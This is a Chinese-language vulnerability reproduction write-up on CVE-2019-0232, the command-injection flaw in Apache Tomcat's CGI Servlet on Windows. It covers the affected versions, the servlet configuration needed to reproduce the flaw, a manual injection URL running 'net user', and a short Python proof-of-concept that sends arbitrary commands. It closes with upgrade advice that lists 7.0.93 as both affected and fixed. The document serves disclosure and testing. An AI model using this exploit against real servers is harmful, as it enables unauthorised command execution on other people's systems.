漏洞簡介2019年4月10日,Apache Tomcat報告了一個漏洞,報告中稱在windows上運行的Apache Tomcat存在遠程代碼執行漏洞,漏洞編號爲CVE-2019-0232。在Windows平臺,遠程攻擊者向CGI Servlet發送一個精心設計的請求,在具有Apache Tomcat權限的系統上注入和執行任意操作系統命令。漏洞成因是當將參數從JRE傳遞到Windows環境時,由於CGI_Servlet中的輸入驗證錯誤而存在該漏洞。CGI_Servlet默認是關閉的。
影響範圍
Apache Tomcat 9.0.0.M1 to 9.0.17
Apache Tomcat 8.5.0 to 8.5.39
Apache Tomcat 7.0.0 to 7.0.93
漏洞復現
測試環境
Tomcat 8.5.39
JDK 8u121
0X00修改配置文件
- web.xml
<servlet>
<servlet-name>cgi</servlet-name>
<servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>cgiPathPrefix</param-name>
<param-value>WEB-INF/cgi-bin</param-value>
</init-param>
<init-param>
<param-name>executable</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>5</load-on-startup>
</servlet>
<!-- The mapping for the CGI Gateway servlet -->
<servlet-mapping>
<servlet-name>cgi</servlet-name>
<url-pattern>/cgi-bin/*</url-pattern>
</servlet-mapping>
- content.xml
<Context privileged="true">
<!-- Default set of monitored resources. If one of these changes, the -->
<!-- web application will be reloaded. -->
<WatchedResource>WEB-INF/web.xml</WatchedResource>
<WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>
<!-- Uncomment this to disable session persistence across Tomcat restarts -->
<!--
<Manager pathname="" />
-->
</Context>
將WEB-INF 文件移動到 /webapps/ROOT 然後啓動tomcat,WEB-INF以下參考鏈接可以下載到。
手動測試:
http://127.0.0.1:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet%20user
poc
import requests
import sys
# http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user
url = sys.argv[1]
url_dir = "/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5C"
cmd = sys.argv[2]
vuln_url = url + url_dir +cmd
print ("Usage: python CVE-2019-0232.py url cmd")
print ("The Vuln url:\n\n" ,vuln_url)
r = requests.get(vuln_url)
print("\nThe Vuln Response Content: \n\n" , r.text)
修復措施
受影響版本的用戶應該應用下列其中一項緩解。升級到:
-
Apache Tomcat 9.0.18或更高版本
-
Apache Tomcat 8.5.40或更高版本
-
Apache Tomcat 7.0.93或更高版本